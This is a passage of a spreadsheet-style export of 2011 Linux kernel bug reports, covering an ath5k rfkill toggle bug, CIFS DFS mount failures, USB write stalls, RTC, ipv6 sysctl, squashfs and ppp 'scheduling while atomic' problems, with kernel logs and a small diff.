    <t>This seems to be the same issue as https://bugzilla.kernel.org/show_bug.cgi?id=29132 but for ath5k. I've been fighting with an issue that seems very similar. On an Acer Aspire 4520 with an Atheros AR5001 Wireless Network Adapter, kernel 2.6.37.3, sometimes rfkill seemed to get stuck in 'Hard blocked: yes'. Pressing the wlan switch (it's a soft toggle, not a physical slider) seemed to toggle only 'Soft blocked' and it was impossible to actually get the card running again. I think I've now figured out what actually happens: when booting with an enabled wlan (= disabled rfkill), switching between blocked and unblocked states works without problems. When booting with wlan disabled (= rfkill enabled), toggling the wlan switch does NOT take effect immediately, but only after REBOOTING the computer. Un- and reloading ath5k does not help. This leads to very confusing situations where it sometimes works, sometimes it doesn't, and nobody knows how to reproduce the issue. Here's a walkthrough of the entire procedure, starting with a session that has wlan enabled and everything working. Initial state: 0: phy0: Wireless LAN Soft blocked: no Hard blocked: no After toggling wlan switch the first time: 0: phy0: Wireless LAN Soft blocked: yes Hard blocked: no After toggling wlan switch the second time: 0: phy0: Wireless LAN Soft blocked: no Hard blocked: no Note that wlan works at this point as expected. The first toggle disabled it, the second reenabled it. What I will do now is toggle the switch one more time (which will disable the wlan) and reboot the computer. After the reboot, wlan does NOT work. However, rfkill lists the following: 0: phy0: Wireless LAN Soft blocked: no Hard blocked: no ifconfig shows the interface as up. iwlist wlan0 scan returns with 'No scan results'. After pressing the wlan switch once: 0: phy0: Wireless LAN Soft blocked: yes Hard blocked: no After pressing it a second time (notice the Hard block): 0: phy0: Wireless LAN Soft blocked: no Hard blocked: yes A third time: 0: phy0: Wireless LAN Soft blocked: yes Hard blocked: yes Subsequent presses only switch between the previous 2 states. The wlan doesn't work at any point during this. Trying to put wlan0 up with ifconfig returns 'SIOCSIFFLAGS: Operation not possible due to RF-kill'. *However*, after rebooting, the wlan switch action takes effect. This means that an even number of wlan toggles will result in a blocked (= nonworking) state, and an odd number of wlan toggles will result in an unblocked state. I was able to reproduce this 100% of the time once I actually figured out what was going on. If you need more info please let me know. PS: This bug report also seems very relevant, but it's about the sony-laptop module?? https://bugzilla.kernel.org/show_bug.cgi?id=15303 I also found a ton of bug reports that basically describe the same issue, all with different hardware, wlan modules, so it's kind of confusing that many of them mention hardware/brand specific fixes..</t>
  </si>
  <si>
    <t>Unable to mount DFS filesystems from Windows 2008 servers</t>
  </si>
  <si>
    <t>2011-03-14 13:31 UTC</t>
  </si>
  <si>
    <t>2011-05-30 08:34 UTC</t>
  </si>
  <si>
    <t>Note: see also https://bugzilla.samba.org/show_bug.cgi?id=8003 It seems that w2k8 behaves slightly differently than w2k3 and prior when it comes to DFS, at least when it comes to the various linux client implementations. We have a DFS shared folder at \\ourcorp.net\sharename\project. ourcorp.net is round-robin load-balanced between about 20 servers, of which maybe 20% are running w2k8. From what I can tell, a mount request from mount.cifs sends out an immediate TreeConnectAndXRequest to \\ourcorp.net\sharename. The w2k3 servers will respond with STATUS_PATH_NOT_COVERED, and the client will then do a TreeConnectAndX to ICP$ and ask with a GET_DFS_REFERRAL for \ourcorp.net\sharename\project, which gets a response and everything seems to work. However, to a 2k8 server, the server will respond with NT_STATUS_BAD_NETWORK_NAME, and the cifs support in the kernel will just bail out with errno = -6. The end result is that mount.cifs works about 80% of the time at our site :/ From some observations with wireshark it seems that a windows 7 client will immediately try to connect to the IPC$ connect and ask for the dfs referrals for \ourcorp.net\sharename (no \project). It will then follow these referrals, and re-append \project when querying the next server. The patch I submitted in https://bugzilla.samba.org/show_bug.cgi?id=8003 (which has not yet been reviewed, but it's just a couple hours old :) basically falls back to asking for referrals for \site\share when \site\share\project doesn't work. I don't think that is sufficient here though, as you don't seem to be initially asking for the referrals like the samba client and windows client does. So I guess you'd need this, plus an initial DFS query. I will attach some cifsFYI / traceSamba output after I can sanitize the data to protect the names of the innocent. :)</t>
  </si>
  <si>
    <t>Large write to USB stick freezes unrelated tasks for a long time</t>
  </si>
  <si>
    <t>2.6.38-rc8</t>
  </si>
  <si>
    <t>2011-03-15 15:55 UTC</t>
  </si>
  <si>
    <t>2012-06-13 15:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 50902 [details] kernel backtraces from hung Eclipse task while writing to usb stick System is Fedora 14 x86_64 with 4 GB RAM, running vanilla kernel 2.6.38-rc8. I have a USB 2.0 high-speed memory stick with around 7.5 GB of space. Whenenver I write a large amount of data (several GBs of files) through any means (cp, nautilus GUI, etc), I notice some large applications that I consider unrelated to the I/O operation (Firefox web browser, Thunderbird email viewer, Eclipse IDE) may randomly freeze whenever I try to interact with them. I use Compiz, and I notice the apps getting grayed out, but I have also seen the freeze happening with Metacity and Gnome-shell, so I believe the window manager is irrelevant. Sometimes other smaller tasks (gnome-terminal, gedit) also freeze. For Eclipse, the hang also cause a series of kernel backtraces, attached to this report. The hang usually lasts for several tens of seconds, and may freeze and unfreeze several times while the file copying to USB takes place. All of the hung applications unfreeze themselves after write activity (as seen from the LED in the memory stick) ceases. Reproducibility: always (with sufficiently large bulk write) To reproduce: 1) have an usb stick with several GB of free space, with any filesystem (tried vfat and udf) 2) prepare several gb of files to copy from hard disk to usb stick 3) start large application (firefox, eclipse, or thunderbird) 4) check that application is responsive before file copy starts 5) insert usb stick and (auto)mount it. Previously started app is still responsive. 6) start file copy to usb stick with any command 7) attempt to interact with chosen application during the entirety of the file write Expected result: I/O to usb stick takes place in background, unrelated apps continue to be responsive in foreground. Actual result: some large tasks freeze for tens of seconds while write takes place. Feel free to reassign this bug to a different category. It involves I/O, block, USB, and mmap.</t>
  </si>
  <si>
    <t>RTC: alarm time and day wrong</t>
  </si>
  <si>
    <t>2011-03-16 13:26 UTC</t>
  </si>
  <si>
    <t>Joerg Riechardt</t>
  </si>
  <si>
    <t>2011-03-27 19:49 UTC</t>
  </si>
  <si>
    <t>I have a VDR PC used for tv recording, so it has to wake up by BIOS. To check if the next startup time is set properly after manual start, I use cat /proc/driver/rtc. Since 2.6.38 this is not working any more. It does not show the startup time set in the BIOS, but is (re)set to 00:00:00 1970-01-01.</t>
  </si>
  <si>
    <t>/proc/sys/net/ipv6 has two neigh folders</t>
  </si>
  <si>
    <t>2011-03-16 22:06 UTC</t>
  </si>
  <si>
    <t>Andreas Sundstrom</t>
  </si>
  <si>
    <t>I noticed when looking for other things that there are two neigh folders in /proc/sys/net/ipv6 Reverting this commit removes the extra neigh folder: http://git.kernel.org/?p=linux/kernel/git/next/linux-next.git;a=commitdiff;h=bf36076a67db6d7423d09d861a072337866f0dd9 I don't know how to fix this. I tried removing the ',' on the row '.child = empty,' (looking at the other rows it did seem like a typo to me). This did not change anything that I could see though. Here is the commit I believe introduced the bug: --- a/net/ipv6/sysctl_net_ipv6.c +++ b/net/ipv6/sysctl_net_ipv6.c @@ -15,6 +15,8 @@ #include &lt;net/addrconf.h&gt; #include &lt;net/inet_frag.h&gt; +static struct ctl_table empty[1]; + static ctl_table ipv6_table_template[] = { { .procname = "route", @@ -35,6 +37,12 @@ static ctl_table ipv6_table_template[] = { .mode = 0644, .proc_handler = proc_dointvec }, + { + .procname = "neigh", + .maxlen = 0, + .mode = 0555, + .child = empty, + }, { } }; @@ -152,7 +160,6 @@ static struct ctl_table_header *ip6_base; int ipv6_static_sysctl_register(void) { - static struct ctl_table empty[1]; ip6_base = register_sysctl_paths(net_ipv6_ctl_path, empty); if (ip6_base == NULL) return -ENOMEM;</t>
  </si>
  <si>
    <t>BUG: scheduling while atomic: wpa_supplicant/754/0x10000500</t>
  </si>
  <si>
    <t>2.6.38-6 2.6.38-7</t>
  </si>
  <si>
    <t>2011-03-17 21:31 UTC</t>
  </si>
  <si>
    <t>2011-03-24 14:16 UTC</t>
  </si>
  <si>
    <t>ProblemType: KernelOops DistroRelease: Ubuntu 11.04 Package: linux-image-2.6.38-6-generic 2.6.38-6.34 Regression: No Reproducible: Yes ProcVersionSignature: Ubuntu 2.6.38-6.34-generic 2.6.38-rc7 Uname: Linux 2.6.38-6-generic i686 AlsaVersion: Advanced Linux Sound Architecture Driver Version 1.0.23. Annotation: Your system might become unstable now and might need to be restarted. AplayDevices: **** List of PLAYBACK Hardware Devices **** card 0: Intel [HDA Intel], device 0: ALC269 Analog [ALC269 Analog] Subdevices: 1/1 Subdevice #0: subdevice #0 Architecture: i386 ArecordDevices: **** List of CAPTURE Hardware Devices **** card 0: Intel [HDA Intel], device 0: ALC269 Analog [ALC269 Analog] Subdevices: 1/1 Subdevice #0: subdevice #0 AudioDevicesInUse: USER PID ACCESS COMMAND /dev/snd/controlC0: shulik 1658 F.... pulseaudio CRDA: Error: [Errno 2] Нет такого файла или каталога Card0.Amixer.info: Card hw:0 'Intel'/'HDA Intel at 0xf7cf8000 irq 46' Mixer name : 'Realtek ALC269' Components : 'HDA:10ec0269,10438437,00100004' Controls : 9 Simple ctrls : 5 Date: Tue Mar 15 13:23:13 2011 Failure: oops HibernationDevice: RESUME=UUID=01298b9b-2a74-48b3-b217-3db94352c80b InstallationMedia: Ubuntu-Netbook 10.10 "Maverick Meerkat" - Release i386 (20101007) MachineType: ASUSTeK Computer INC. 1005PX ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-2.6.38-6-generic root=UUID=e9a425fb-f4fb-4743-bb34-c976e90ee158 ro quiet splash vt.handoff=7 RelatedPackageVersions: linux-restricted-modules-2.6.38-6-generic N/A linux-backports-modules-2.6.38-6-generic N/A linux-firmware 1.48 SourcePackage: linux Title: BUG: scheduling while atomic: wpa_supplicant/754/0x10000500 UpgradeStatus: Upgraded to natty on 2011-03-12 (2 days ago) dmi.bios.date: 04/30/2010 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 0601 dmi.board.asset.tag: To Be Filled By O.E.M. dmi.board.name: 1001PX dmi.board.vendor: ASUSTeK Computer INC. dmi.board.version: x.xx dmi.chassis.asset.tag: 0x00000000 dmi.chassis.type: 10 dmi.chassis.vendor: ASUSTeK Computer INC. dmi.chassis.version: x.x dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr0601:bd04/30/2010:svnASUSTeKComputerINC.:pn1005PX:pvrx.x:rvnASUSTeKComputerINC.:rn1001PX:rvrx.xx:cvnASUSTeKComputerINC.:ct10:cvrx.x: dmi.product.name: 1005PX dmi.product.version: x.x dmi.sys.vendor: ASUSTeK Computer INC.</t>
  </si>
  <si>
    <t>squashfs crashes..</t>
  </si>
  <si>
    <t>2011-03-19 07:22 UTC</t>
  </si>
  <si>
    <t>2011-04-01 22:47 UTC</t>
  </si>
  <si>
    <t>I have a script that regularly squashes old emails in a file on the local filesystem. Quite frequently, but not always, I find these crashes in the system logs: I'm also attaching my script, which runs as a cron job and my kernel config Mar 19 06:00:02 gollum kernel: mount: page allocation failure. order:4, mode:0x40d0 Mar 19 06:00:02 gollum kernel: Pid: 21000, comm: mount Not tainted 2.6.38-gentoo #2 Mar 19 06:00:02 gollum kernel: Call Trace: Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8106ff79&gt;] ? __alloc_pages_nodemask+0x559/0x780 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8112b570&gt;] ? squashfs_fill_super+0x0/0x640 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff810701b2&gt;] ? __get_free_pages+0x12/0x60 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8112c086&gt;] ? zlib_init+0x36/0x60 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8112b871&gt;] ? squashfs_fill_super+0x301/0x640 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8112b570&gt;] ? squashfs_fill_super+0x0/0x640 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8109c336&gt;] ? mount_bdev+0x1a6/0x1f0 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8107b784&gt;] ? kstrdup+0x54/0x70 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8109aea5&gt;] ? vfs_kern_mount+0x75/0x1a0 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8109b043&gt;] ? do_kern_mount+0x53/0x110 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff810b4734&gt;] ? do_mount+0x2d4/0x7b0 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff8107b5ff&gt;] ? memdup_user+0x3f/0x80 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff810b4caa&gt;] ? sys_mount+0x9a/0x100 Mar 19 06:00:02 gollum kernel: [&lt;ffffffff81002438&gt;] ? system_call_fastpath+0x16/0x1b Mar 19 06:00:02 gollum kernel: Mem-Info: Mar 19 06:00:02 gollum kernel: DMA per-cpu: Mar 19 06:00:02 gollum kernel: CPU 0: hi: 0, btch: 1 usd: 0 Mar 19 06:00:02 gollum kernel: DMA32 per-cpu: Mar 19 06:00:02 gollum kernel: CPU 0: hi: 186, btch: 31 usd: 0 Mar 19 06:00:02 gollum kernel: active_anon:55937 inactive_anon:75966 isolated_anon:0 Mar 19 06:00:02 gollum kernel: active_file:51853 inactive_file:51771 isolated_file:0 Mar 19 06:00:02 gollum kernel: unevictable:8 dirty:284 writeback:326 unstable:0 Mar 19 06:00:02 gollum kernel: free:2752 slab_reclaimable:5071 slab_unreclaimable:4755 Mar 19 06:00:02 gollum kernel: mapped:2823 shmem:45 pagetables:3183 bounce:0 Mar 19 06:00:02 gollum kernel: DMA free:4044kB min:60kB low:72kB high:88kB active_anon:4kB inactive_anon:3988kB active_file:4100kB inactive_file:3560kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15692kB mlocked:0kB dirty:0kB writeback:0kB mapped:324kB shmem:0kB slab_reclaimable:204kB slab_unreclaimable:0kB kernel_stack:0kB pagetables:16kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no Mar 19 06:00:02 gollum kernel: lowmem_reserve[]: 0 991 991 991 Mar 19 06:00:02 gollum kernel: DMA32 free:6964kB min:3996kB low:4992kB high:5992kB active_anon:223744kB inactive_anon:299876kB active_file:203312kB inactive_file:203524kB unevictable:32kB isolated(anon):0kB isolated(file):0kB present:1014984kB mlocked:32kB dirty:1136kB writeback:1304kB mapped:10968kB shmem:180kB slab_reclaimable:20080kB slab_unreclaimable:19020kB kernel_stack:2120kB pagetables:12716kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no Mar 19 06:00:02 gollum kernel: lowmem_reserve[]: 0 0 0 0 Mar 19 06:00:02 gollum kernel: DMA: 3*4kB 2*8kB 1*16kB 1*32kB 0*64kB 1*128kB 1*256kB 1*512kB 1*1024kB 1*2048kB 0*4096kB = 4044kB Mar 19 06:00:02 gollum kernel: DMA32: 1725*4kB 6*8kB 1*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 6964kB Mar 19 06:00:02 gollum kernel: 123319 total pagecache pages Mar 19 06:00:02 gollum kernel: 19650 pages in swap cache Mar 19 06:00:02 gollum kernel: Swap cache stats: add 367649, delete 347999, find 4496051/4537150 Mar 19 06:00:02 gollum kernel: Free swap = 1858228kB Mar 19 06:00:02 gollum kernel: Total swap = 2113660kB Mar 19 06:00:02 gollum kernel: 261344 pages RAM Mar 19 06:00:02 gollum kernel: 5447 pages reserved Mar 19 06:00:02 gollum kernel: 142443 pages shared Mar 19 06:00:02 gollum kernel: 146964 pages non-shared Mar 19 06:00:02 gollum kernel: SQUASHFS error: Failed to allocate zlib workspace Mar 19 06:00:05 gollum kernel: mount: page allocation failure. order:4, mode:0x40d0 Mar 19 06:00:05 gollum kernel: Pid: 21111, comm: mount Not tainted 2.6.38-gentoo #2 Mar 19 06:00:05 gollum kernel: Call Trace: Mar 19 06:00:05 gollum kernel: [&lt;ffffffff8106ff79&gt;] ? __alloc_pages_nodemask+0x559/0x780 Mar 19 06:00:05 gollum kernel: [&lt;ffffffff8112b570&gt;] ? squashfs_fill_super+0x0/0x640 Mar 19 06:00:05 gollum kernel: [&lt;ffffffff810701b2&gt;] ? __get_free_pages+0x12/0x60 Mar 19 06:00:05 gollum kernel: [&lt;ffffffff8112c086&gt;] ? zlib_init+0x36/0x60 Mar 19 06:00:05 gollum kernel: [&lt;ffffffff8112b871&gt;] ? squashfs_fill_super+0x301/0x640 Mar 19 06:00:05 gollum kernel: [&lt;ffffffff8112b570&gt;] ? squashfs_fill_super+0x0/0x640 Mar 19 06:00:05 gollum kernel: [&lt;ffffffff8109c336&gt;] ? mount_bdev+0x1a6/0x1f0 Mar 19 06:00:06 gollum kernel: [&lt;ffffffff8107b784&gt;] ? kstrdup+0x54/0x70 Mar 19 06:00:06 gollum kernel: [&lt;ffffffff8109aea5&gt;] ? vfs_kern_mount+0x75/0x1a0 Mar 19 06:00:06 gollum kernel: [&lt;ffffffff8109b043&gt;] ? do_kern_mount+0x53/0x110 Mar 19 06:00:06 gollum kernel: [&lt;ffffffff810b4734&gt;] ? do_mount+0x2d4/0x7b0 Mar 19 06:00:06 gollum kernel: [&lt;ffffffff8107b5ff&gt;] ? memdup_user+0x3f/0x80 Mar 19 06:00:06 gollum kernel: [&lt;ffffffff810b4caa&gt;] ? sys_mount+0x9a/0x100 Mar 19 06:00:06 gollum kernel: [&lt;ffffffff81002438&gt;] ? system_call_fastpath+0x16/0x1b Mar 19 06:00:06 gollum kernel: Mem-Info: Mar 19 06:00:06 gollum kernel: DMA per-cpu: Mar 19 06:00:06 gollum kernel: CPU 0: hi: 0, btch: 1 usd: 0 Mar 19 06:00:06 gollum kernel: DMA32 per-cpu: Mar 19 06:00:06 gollum kernel: CPU 0: hi: 186, btch: 31 usd: 0 Mar 19 06:00:06 gollum kernel: active_anon:76546 inactive_anon:79637 isolated_anon:28 Mar 19 06:00:06 gollum kernel: active_file:38401 inactive_file:38314 isolated_file:12 Mar 19 06:00:06 gollum kernel: unevictable:8 dirty:344 writeback:1214 unstable:0 Mar 19 06:00:06 gollum kernel: free:4799 slab_reclaimable:4999 slab_unreclaimable:4679 Mar 19 06:00:06 gollum kernel: mapped:2477 shmem:47 pagetables:3434 bounce:0 Mar 19 06:00:06 gollum kernel: DMA free:4036kB min:60kB low:72kB high:88kB active_anon:4kB inactive_anon:3988kB active_file:4100kB inactive_file:3560kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15692kB mlocked:0kB dirty:0kB writeback:0kB mapped:324kB shmem:0kB slab_reclaimable:204kB slab_unreclaimable:0kB kernel_stack:8kB pagetables:16kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no Mar 19 06:00:06 gollum kernel: lowmem_reserve[]: 0 991 991 991 Mar 19 06:00:06 gollum kernel: DMA32 free:15160kB min:3996kB low:4992kB high:5992kB active_anon:306180kB inactive_anon:314560kB active_file:149504kB inactive_file:149696kB unevictable:32kB isolated(anon):112kB isolated(file):48kB present:1014984kB mlocked:32kB dirty:1376kB writeback:4856kB mapped:9584kB shmem:188kB slab_reclaimable:19792kB slab_unreclaimable:18716kB kernel_stack:2280kB pagetables:13720kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no Mar 19 06:00:06 gollum kernel: lowmem_reserve[]: 0 0 0 0 Mar 19 06:00:06 gollum kernel: DMA: 3*4kB 1*8kB 1*16kB 1*32kB 0*64kB 1*128kB 1*256kB 1*512kB 1*1024kB 1*2048kB 0*4096kB = 4036kB Mar 19 06:00:06 gollum kernel: DMA32: 1548*4kB 387*8kB 223*16kB 66*32kB 3*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15160kB Mar 19 06:00:06 gollum kernel: 101665 total pagecache pages Mar 19 06:00:06 gollum kernel: 24891 pages in swap cache Mar 19 06:00:06 gollum kernel: Swap cache stats: add 375464, delete 350573, find 4496771/4537891 Mar 19 06:00:06 gollum kernel: Free swap = 1829272kB Mar 19 06:00:06 gollum kernel: Total swap = 2113660kB Mar 19 06:00:06 gollum kernel: 261344 pages RAM Mar 19 06:00:06 gollum kernel: 5447 pages reserved Mar 19 06:00:06 gollum kernel: 121473 pages shared Mar 19 06:00:06 gollum kernel: 167145 pages non-shared Mar 19 06:00:06 gollum kernel: SQUASHFS error: Failed to allocate zlib workspace</t>
  </si>
  <si>
    <t>ath9k: throughput issue in 802.11n and also IBSS mode</t>
  </si>
  <si>
    <t>2011-03-19 19:06 UTC</t>
  </si>
  <si>
    <t>Richard Schütz</t>
  </si>
  <si>
    <t>2011-04-30 20:05 UTC</t>
  </si>
  <si>
    <t>The troughput of my wireless connection with ath9k (AR9285 chipset) in 802.11n mode with 2.6.38 is much lower (up to over 10 times) compared to 2.6.37.4. 802.11g seems to be unaffected. I also noticed that the "Invalid misc" counter shown by iwconfig rises quickly.</t>
  </si>
  <si>
    <t>'scheduling while atomic' during ppp connection</t>
  </si>
  <si>
    <t>2011-03-20 11:50 UTC</t>
  </si>
  <si>
    <t>mac</t>
  </si>
  <si>
    <t>2012-05-12 14:53 UTC</t>
  </si>
  <si>
    <t>Hi, when I am connected to Internet through ppp connection by nozomi driver (PCMCIA Option N.V. Qualcomm MSM6275 UMTS chip) for almost every minute I get such messages on all terminal and opened xterms. In any other scenario - connection via Ethernet or WiFi issue not exists. (Please add my e-mail address to CC when you will reply to this message! Thx!) Message from syslogd@granit at Sat Mar 19 22:48:50 2011 ... granit kernel: [ 8176.570123] Stack: Message from syslogd@granit at Sat Mar 19 22:48:50 2011 ... granit kernel: [ 8176.570168] Code: ff 0d fa 19 00 00 e8 59 1f fe e0 48 89 c7 b9 e8 03 00 00 31 d2 4c 29 e7 48 89 f8 48 f7 f1 49 89 c4 e8 17 fe fd e0 fb 80 7b 08 01 &lt;74&gt; 0f 48 8b 04 25 48 10 75 81 83 88 3c e0 ff ff 04 ff 43 18 31 Message from syslogd@granit at Sat Mar 19 22:48:50 2011 ... granit kernel: [ 8176.569158] Call Trace: Message from syslogd@granit at Sat Mar 19 22:48:50 2011 ... granit kernel: [ 8176.569186] Code: df e8 ca fc ff ff e8 7b 1e fe e0 48 89 c7 b9 e8 03 00 00 31 d2 4c 29 e7 48 89 f8 48 f7 f1 49 89 c4 e8 39 fd fd e0 fb 80 7b 08 01 &lt;74&gt; 0f 48 8b 04 25 48 10 75 81 83 88 3c e0 ff ff 04 ff 43 18 31 Message from syslogd@granit at Sat Mar 19 22:48:50 2011 ... granit kernel: [ 8176.570139] Call Trace: Message from syslogd@granit at Sat Mar 19 22:48:50 2011 ... granit kernel: [ 8176.569140] Stack: -------------------------------- dmesg returned: [ 9229.131031] BUG: scheduling while atomic: firefox-bin/1992/0x10000800 [ 9229.131035] Modules linked in: ppp_async crc_ccitt ppp_generic slhc snd_hda_codec_realtek ath5k ath processor battery ac snd_hda_intel r8169 sdhci_pci sparse_keymap sdhci snd_hda_codec mmc_core nozomi container snd_hwdep [ 9229.131076] Pid: 1992, comm: firefox-bin Not tainted 2.6.38 #1 [ 9229.131079] Call Trace: [ 9229.131089] [] ? schedule+0x67/0x3db [ 9229.131095] [] ? nf_conntrack_tuple_taken+0xa2/0xad [ 9229.131102] [] ? __cond_resched+0x1c/0x25 [ 9229.131105] [] ? _cond_resched+0x16/0x20 [ 9229.131109] [] ? mutex_lock+0xe/0x21 [ 9229.131116] [] ? ntty_write+0x5d/0x192 [nozomi] [ 9229.131121] [] ? __mod_timer.clone.30+0xbe/0xcc [ 9229.131126] [] ? check_preempt_curr+0x60/0x6d [ 9229.131130] [] ? __nf_ct_refresh_acct+0x75/0xbe [ 9229.131135] [] ? ppp_async_push+0xa9/0x3bd [ppp_async] [ 9229.131140] [] ? ppp_async_send+0x34/0x40 [ppp_async] [ 9229.131146] [] ? ppp_push+0x6c/0x4f9 [ppp_generic] [ 9229.131152] [] ? selinux_ip_postroute+0x3d/0x210 [ 9229.131156] [] ? ipt_do_table+0x300/0x328 [ 9229.131162] [] ? _local_bh_enable_ip.clone.10+0x1f/0x88 [ 9229.131166] [] ? ipt_do_table+0x300/0x328 [ 9229.131171] [] ? ppp_xmit_process+0x3f5/0x472 [ppp_generic] [ 9229.131176] [] ? ppp_start_xmit+0x155/0x174 [ppp_generic] [ 9229.131181] [] ? dev_hard_start_xmit+0x3c7/0x4a0 [ 9229.131186] [] ? sch_direct_xmit+0x3e/0xee [ 9229.131190] [] ? dev_queue_xmit+0x1cd/0x322 [ 9229.131194] [] ? ip_queue_xmit+0x2d4/0x330 [ 9229.131200] [] ? file_update_time+0x30/0x101 [ 9229.131204] [] ? tcp_transmit_skb+0x6ee/0x721 [ 9229.131208] [] ? tcp_write_xmit+0x765/0x851 [ 9229.131213] [] ? __alloc_skb+0x81/0x121 [ 9229.131217] [] ? __tcp_push_pending_frames+0x18/0x44 [ 9229.131221] [] ? tcp_close+0x127/0x2f7 [ 9229.131226] [] ? inet_release+0x53/0x5c [ 9229.131231] [] ? sock_release+0x19/0x6e [ 9229.131234] [] ? sock_close+0x22/0x29 [ 9229.131239] [] ? fput+0xf8/0x19a [ 9229.131243] [] ? filp_close+0x5d/0x68 [ 9229.131246] [] ? sys_close+0x6f/0x9e [ 9229.131251] [] ? system_call_fastpath+0x16/0x1b [ 9261.546054] BUG: scheduling while atomic: firefox-bin/1983/0x10000900 [ 9261.546057] Modules linked in: ppp_async crc_ccitt ppp_generic slhc snd_hda_codec_realtek ath5k ath processor battery ac snd_hda_intel r8169 sdhci_pci sparse_keymap sdhci snd_hda_codec mmc_core nozomi container snd_hwdep [ 9261.546077] CPU 0 [ 9261.546078] Modules linked in: ppp_async crc_ccitt ppp_generic slhc snd_hda_codec_realtek ath5k ath processor battery ac snd_hda_intel r8169 sdhci_pci sparse_keymap sdhci snd_hda_codec mmc_core nozomi container snd_hwdep [ 9261.546094] [ 9261.546097] Pid: 1983, comm: firefox-bin Not tainted 2.6.38 #1 TOSHIBA Satellite A135/IAKAA [ 9261.546103] RIP: 0033:[&lt;00007f61448c9325&gt;] [&lt;00007f61448c9325&gt;] 0x7f61448c93 25 [ 9261.546111] RSP: 002b:00007fffba8d5a10 EFLAGS: 00000246 [ 9261.546114] RAX: 0000000000000000 RBX: 000000000000fe2e RCX: 000000000000000c [ 9261.546117] RDX: 0000000000000001 RSI: 0000000000000003 RDI: 0000000000000003 [ 9261.546120] RBP: 00007f611b0015f0 R08: 00007f6144bc5040 R09: 00000000000007bf [ 9261.546123] R10: 00007f6135987c00 R11: 00007f6143528406 R12: ffffffff8100310e [ 9261.546126] R13: 00007fffba8d4c00 R14: 00007f6135987c00 R15: 00007f6135987c00 [ 9261.546130] FS: 00007f6144cc6760(0000) GS:ffffffff81754000(0000) knlGS:0000000000000000 [ 9261.546134] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 9261.546137] CR2: 00007f611f167000 CR3: 000000002e51d000 CR4: 00000000000006f0 [ 9261.546140] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 9261.546143] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 9261.546147] Process firefox-bin (pid: 1983, threadinfo ffff88002e70c000, task ffff88002e697690) [ 9261.546150] [ 9261.546151] Call Trace: [ 9261.547048] BUG: scheduling while atomic: firefox-bin/1983/0x10000900 [ 9261.547052] Modules linked in: ppp_async crc_ccitt ppp_generic slhc snd_hda_codec_realtek ath5k ath processor battery ac snd_hda_intel r8169 sdhci_pci sparse_keymap sdhci snd_hda_codec mmc_core nozomi container snd_hwdep [ 9261.547070] CPU 0 [ 9261.547071] Modules linked in: ppp_async crc_ccitt ppp_generic slhc snd_hda_codec_realtek ath5k ath processor battery ac snd_hda_intel r8169 sdhci_pci sparse_keymap sdhci snd_hda_codec mmc_core nozomi container snd_hwdep [ 9261.547086] [ 9261.547090] Pid: 1983, comm: firefox-bin Not tainted 2.6.38 #1 TOSHIBA Satellite A135/IAKAA [ 9261.547095] RIP: 0033:[&lt;00007f6143be649c&gt;] [&lt;00007f6143be649c&gt;] 0x7f6143be649c [ 9261.547102] RSP: 002b:00007fffba8d44c8 EFLAGS: 00000246 [ 9261.547105] RAX: 00007f6134d32120 RBX: 000000000000fe2e RCX: fffbff61234c8068 [ 9261.547109] RDX: 00007f6135bfe1c8 RSI: 00007f6135987c00 RDI: 0000000000000000 [ 9261.547112] RBP: 00007fffba8d4fe0 R08: 0000000000000001 R09: 00000000000007bf [ 9261.547115] R10: 0000000000000000 R11: 00007f61437786fd R12: ffffffff8100310e [ 9261.547118] R13: 00007fffba8d4c00 R14: 00007f6135987c00 R15: 00007f6135987c00 [ 9261.547122] FS: 00007f6144cc6760(0000) GS:ffffffff81754000(0000) knlGS:0000000000000000 [ 9261.547125] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 9261.547128] CR2: 00007f611f167000 CR3: 000000002e51d000 CR4: 00000000000006f0 [ 9261.547132] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 9261.547135] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 9261.547138] Process firefox-bin (pid: 1983, threadinfo ffff88002e70c000, task ffff88002e697690) [ 9261.547141] [ 9261.547142] Call Trace: [ 9357.607036] BUG: scheduling while atomic: swapper/0/0x10000900 [ 9357.607040] Modules linked in: ppp_async crc_ccitt ppp_generic slhc snd_hda_codec_realtek ath5k ath processor battery ac snd_hda_intel r8169 sdhci_pci sparse_keymap sdhci snd_hda_codec mmc_core nozomi container snd_hwdep [ 9357.607059] CPU 0 [ 9357.607060] Modules linked in: ppp_async crc_ccitt ppp_generic slhc snd_hda_codec_realtek ath5k ath processor battery ac snd_hda_intel r8169 sdhci_pci sparse_keymap sdhci snd_hda_codec mmc_core nozomi container snd_hwdep [ 9357.607076] [ 9357.607079] Pid: 0, comm: swapper Not tainted 2.6.38 #1 TOSHIBA Satellite A135/IAKAA [ 9357.607085] 